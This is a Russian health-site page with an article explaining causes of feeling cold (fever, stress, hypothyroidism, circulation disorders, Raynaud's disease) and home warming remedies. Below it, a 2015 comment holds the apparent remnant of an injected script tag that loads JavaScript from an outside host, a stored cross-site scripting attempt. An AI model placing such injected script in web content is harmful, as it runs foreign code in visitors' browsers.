Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему нам бывает холодно...  >>  Почему нам бывает холодно? Всегда ли виновата погода?
 
Обратная связь
 

Почему нам бывает холодно? Всегда ли виновата погода?

Размер шрифта
18 февраля 2011 00:01
  • google_analytics: false
  • Нравится

Наверняка вы встречали людей, которые даже в самую сильную жару кутаются в свитера и шали. Чаще всего это женщины хрупкого телосложения, однако иногда и от вполне здорового на вид мужчины можно услышать: «Что-то меня знобит, наверное, простудился…» Каков механизм возникновения озноба? Почему мы мерзнем и насколько это тревожный признак?

Что это?

Озноб возникает из-за спазма поверхностных кровеносных сосудов, пронизывающих нашу кожу. Это явление сопровождается ощущением холода, мышечной дрожью и спазмом кожных мышц – появляется так называемая «гусиная кожа». Чаще всего озноб является признаком начинающейся лихорадки (повышения температуры) – при инфекциях, травмах и других заболеваниях. При ознобе отдача тепла организмом во внешнюю среду уменьшается, а выработка его возрастает (вследствие мышечных сокращений), что ведет к повышению температуры тела. Когда температура стабилизируется (неважно, повышенная или нормальная), озноб обычно кончается. Но если температура колеблется – то снижается, то повышается – озноб возникает снова.

Это не болезнь

Легко возбудимые люди при сильном волнении или испуге могут тоже ощущать озноб и дрожь во всем теле. Однако в отличие от озноба, сопровождающего повышение температуры, это явление невротического толка, это всего лишь субъективное ощущение, которое проходит, стоит только человеку успокоиться и расслабиться.

Познабливать может и от усталости, и от перенесенного стресса, и при снижении давления, и от легких недомоганий различного происхождения, - например, у женщин – до или во время месячных и в первые недели беременности.

У здорового человека озноб может возникнуть на холоде – как нормальная защитная реакция организма.

Диагноз поставит доктор

Самая частая причина озноба – инфекционные заболевания. Дело в том, что вирус, попадая в организм человека, провоцирует образование в организме пирогенов – особых веществ, благодаря которым кровь внутри сосудов становится горячей. Затем постепенно повышается и температура тела. В период уравнивания этих температур и происходит озноб – дрожь во всем теле.

Будьте внимательны! Озноб может быть симптомом опасного заболевания (хронической инфекции, гнойного воспаления и даже злокачественного образования). Если озноб не проходит в течение нескольких дней, необходимо обратиться к врачу.

Часто жалуются на озноб люди со слабым периферическим кровообращением, особенно живущие в прохладном и сыром климате. В холодную погоду циркуляция крови снижается, поступление кислорода в пальцы рук и ног уменьшается до такой степени, что кожа краснеет, припухает, возникает зуд. Самое мучительное при этом, что попытки обогреть конечности у печки или камина усугубляют ощущение припухлости и провоцируют жгучий зуд.

Будьте внимательны! Мучительный холод в конечностях может быть симптомом сахарного диабета или облитерирующего эндартериита – опасного заболевания, поражающего сосуды и приводящего к прогрессирующему нарушению кровообращения, нередко заканчивающегося гангреной. Облитерирующий эндартериит чаще всего поражает курильщиков со стажем.

Постоянное ощущение холода может быть признаком снижения функции щитовидной железы. Здоровая щитовидная железа выделяет гормоны, которые участвуют в процессе терморегуляции организма. Если функция щитовидной железы снижается и гормонов выделяется недостаточно, человек постоянно ощущает холод. Очень часто снижение функции щитовидной железы происходит у женщин старше 50 лет.

Будьте внимательны! Увеличение веса, выпадение волос, сухость кожи, ощущение усталости и холода, частая перемена настроения – все это свидетельствует о дефиците гормонов, выделяемых щитовидной железой. Сдайте анализ на гормоны щитовидной железы.

Прекрасный способ улучшения кровообращения в конечностях – ванночки и массаж. Опустите руки или ноги в емкость с горячей водой, добавив в нее кипарисовое, можжевеловое, сосновое или розмариновое эфирное масло. Можно сделать массаж с подогретым растительным маслом, добавив в него несколько капель эфирного масла (масла черного перца, имбиря или майорана – не более 3% от общего объема). В ванночку для ног хорошо добавить отвар свежего или молотого корня имбиря (15 г корня на 750 мл воды). Применять эфирные масла и отвар имбиря можно лишь в том случае, если на коже нет трещин, ранок и язвочек, иначе может возникнуть воспаление.

Синдром вегето-сосудистой дистонии (ВСД) также нередко сопровождается немотивированными ощущениями холода. Даже в самом жарком помещении человек с ВСД может трястись в ознобе, – в организме таких людей словно бы сбиваются настройки терморегулятора организма: он «выставляет» неправильную температуру тела, пытается охладить его, притом, что и так холодно. При таких симптомах ВСД хорошо помогает закалка, массаж, контрастный душ, сауна, баня, моржевание.

Будьте внимательны! Все эти профилактические меры допустимы только при условии отсутствия заболеваний сердца.

Ощущение холода, сосредоточенное в пальцах рук, может быть симптомом болезни Рейно – периодических спазмов сосудов верхних конечностей. Такие спазмы бывают настолько сильными, что кончики пальцев белеют, а в тяжелых случаях – синеют.

Будьте внимательны! Берегите руки от холода, держите их в тепле, носите теплые перчатки и варежки, мойте руки и посуду горячей водой.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:20

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.